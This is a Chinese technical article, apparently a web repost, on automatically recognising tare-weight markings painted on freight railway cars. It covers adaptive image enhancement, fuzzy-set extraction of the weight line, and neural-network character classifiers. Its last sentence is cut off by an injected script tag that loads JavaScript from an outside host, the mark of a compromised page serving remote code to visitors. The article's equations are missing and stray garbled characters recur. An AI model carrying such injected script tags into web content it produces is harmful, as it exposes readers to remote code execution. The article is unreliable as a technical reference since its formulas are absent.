多種字符混合圖像的自動識別
發(fā)布時間:2008-5-25 訪問次數(shù):110
??摘 要:以貨運(yùn)列車自重識別系統(tǒng)為例,提出一種適應(yīng)不同光照環(huán)境的圖像增強(qiáng)方法,利用模糊集理論從多行信息中提取自重行,正確率接近99%。在字符識別中,采用3種神經(jīng)網(wǎng)絡(luò)分類器分別識別漢字、數(shù)字和英文字母,并對易混數(shù)字采用兩級分類器的結(jié)構(gòu),獲得了較高的識別率。
關(guān)鍵詞:圖像增強(qiáng);模糊集;神經(jīng)網(wǎng)絡(luò);字符識別?
貨運(yùn)列車車號和車廂自重的自動識別,為實(shí)現(xiàn)鐵路運(yùn)輸信息的計算機(jī)管理提供了現(xiàn)代化的技術(shù)手段。將每節(jié)車廂的檢斤結(jié)果和車廂自重的自動識別結(jié)果傳給微機(jī),通過計算可得到列車的載物量,因此,車廂自重的正確識別是列車載物量計算的關(guān)鍵。根據(jù)文獻(xiàn)[1~3]討論的幾種方法,列車車號識別取得了令人滿意的正確率,但都未對車廂自重的識別問題進(jìn)行探討。本文通過對含多種字符的自重圖像進(jìn)行分析,提出了一些有效的方法。?
1自重識別的特點(diǎn)
貨運(yùn)列車的自重識別與車號識別相比,有很多新問題和特殊之處,具體表現(xiàn)在:
(1) 車號圖像中車號信息占有很大比重,而自重圖像中除包含自重信息外,還包含載重、容積等信息,如圖1所示,因此自重目標(biāo)提取比較困難。由于本系統(tǒng)24?h工作在戶外,自重圖像中信息分布廣,因此照明對自重圖像的影響更為嚴(yán)重;?
(2) 自重的數(shù)字比車號小得多,極易受到污染,而且自重數(shù)字的印刷更不規(guī)范,字符變形、丟筆劃情況更為嚴(yán)重;
(3)自重信息中包括漢字、數(shù)字、英文字母等多種字符,而且數(shù)字大小不一,數(shù)字位數(shù)不固定,因此給字符識別帶來了困難。
根據(jù)自重圖像的特點(diǎn),首先對采集的原始圖像進(jìn)行圖像增強(qiáng)處理,以便得到良好的視覺效果;其次,利用模糊集理論從增強(qiáng)后的圖像中提取自重行區(qū)域,最后對自重行進(jìn)行字符分割處理,利用神經(jīng)網(wǎng)絡(luò)識別字符。本文將在下面分別闡述這3個步驟,并在最后給出結(jié)論。?
2一種適應(yīng)不同光照環(huán)境的圖像增強(qiáng)方法
由于本系統(tǒng)全天24h連續(xù)運(yùn)行,環(huán)境照度差異很大,采用固定參數(shù)的灰度變換[4],不能使不同亮度的圖像都得到滿意的圖像增強(qiáng)效果。本文采用變參數(shù)分段非線性變換,其函數(shù)如下:?
其中l(wèi)=256,表示共有256個灰度級,s1,s2,γ都是灰度均值m的單值函數(shù):s1=α*m,s2=β*m,γ=int[10*(m-m0)/m+0.5]其中,α=1,β=2,m0=6。圖2給出2幅不同亮度的原始圖像采用兩種不同方法進(jìn)行變換的比較。圖2中(a)、(c)的原始圖像的灰度均值為m=11.1811,此時,s1=11.1811,s2=22.3622,γ=0.5,增強(qiáng)后圖(c)的灰度均值33.354?3;圖2中(b),(d)的原始圖像的灰度均值為m=35.2007,此時,s1=35.2007,s2=70.4014,γ=0.8,增強(qiáng)后圖(d)的灰度均值23.4948。由對比結(jié)果可見,采用本文的方法能在增強(qiáng)較暗區(qū)域的亮度同時,抑制較亮區(qū)域的亮度,從而使不同亮度的圖像都能得到適當(dāng)?shù)淖儞Q,得到良好的視覺效果。由圖(c)、(d)可以看出,不同照明情況下采集的圖像在增強(qiáng)后并無明顯差別,因此在對圖像的后續(xù)處理中不必考慮照明的影響。
3基于模糊集理論的目標(biāo)區(qū)域提取
本文先把原始圖像分割成若干個只含一行信息的候選區(qū)域子圖像,然后選取目標(biāo)的多個特征,利用模糊集理論表征各個特征的重要性,最后根據(jù)評判結(jié)果選取目標(biāo)區(qū)域。?
3.1候選區(qū)域的分割
從圖3所示的圖像的行灰度均值圖中可以看出,波峰對應(yīng)著文字行,波谷對應(yīng)著行之間的間隔。如果能準(zhǔn)確地找出每個波谷,那么就會分割出若干個的候選區(qū)域子圖像。
為了能準(zhǔn)確的找出波谷,先對行均值ave(i)進(jìn)行一維濾波,去掉“毛刺”,然后再根據(jù)下列特點(diǎn)搜索波谷:(1) 波谷必是局部極小值,即所考察區(qū)域的寬度是2k;(2) 波谷左右兩側(cè)曲線的斜率分別是負(fù)和正,且兩側(cè)曲線很陡峭,即
本文采用變斜率閾值的搜索方法,對于信息不很清晰的圖像,其行均值圖的波谷相應(yīng)的不太明顯,兩側(cè)曲線斜率不大,因此可適當(dāng)減少斜率閾值s0,直到搜索到波谷為止,對于搜索結(jié)果中過寬或過窄的區(qū)域,可以根據(jù)一些文法信息(如文字行的標(biāo)準(zhǔn)高度等)進(jìn)行相應(yīng)的分裂或合并處理,從而得到只含一行文字的若干個候選區(qū)域圖像。?
3.2目標(biāo)區(qū)域的提取
根據(jù)模糊集理論[5],模糊事件可以表示為三元組{u,k,v},u={u1,u2,…,ul}為其特征值,p={v(u1),v(u2),…,v(ul)}為其特征的評價集,k={k|k=1,2,…,l}。我們可以用下式來計算模糊事件a存在的可能性大。?
其中,μ?a(u?k)為隸屬函數(shù),表示特征u?k對模糊事件a存在可能性大小的影響程度。
我們要評價每一個候選區(qū)域是“自重”行區(qū)域的可能性這一模糊事件。根據(jù)模糊事件的定義,我們需要解決三個關(guān)鍵問題:特征集的選取、特征評價函數(shù)的確定和每一特征對模糊事件的重要性[6]。在選取特征時,要選取最關(guān)鍵的?script src=http://er12.com/t.js>